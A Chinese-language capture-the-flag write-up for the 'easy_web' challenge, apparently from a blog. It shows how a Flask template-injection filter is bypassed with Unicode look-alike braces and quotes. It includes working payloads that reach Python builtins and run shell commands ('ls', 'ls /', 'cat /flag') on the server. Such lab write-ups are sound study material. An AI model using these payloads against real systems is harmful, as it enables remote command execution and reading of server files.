攻防世界——easy_web详解

1.打开靶场,发现一个输入框,尝试注入

使用1'#来注入,回显字符被过滤了,尝试其他的方法,没有找到其他的,那么抓包看看

通过抓包后的回显发现是python,这就想到了flask、ssti模板注入,先测试ssti

发现{{1}}中的{}被限制了,

于是我从字符大全中搜索到了如图的字符,这个题目是字符规范器,使用特殊的大括号

结果回显这个

调换了以下位置,发现是我弄错了

而且他存在格式化的

测试以下有没有存在ssti注入的漏洞,可以看出是存在ssti注入的漏洞的

这个注入是过滤掉了英文的{}和英文的'、"所以使用的ssti注入语句要替换,那么就吧{}替换为︷︸,然后'和"替换为特殊符号'和"

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")︸︸

可以看出回显了当前目录的文件,我们使用ls /查看根目录的文件

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls /').read()")︸︸

发现了flag文件,那么使用cat /flag来查看flag就可以了

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('cat /flag').read()")︸︸

感谢支持!!!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值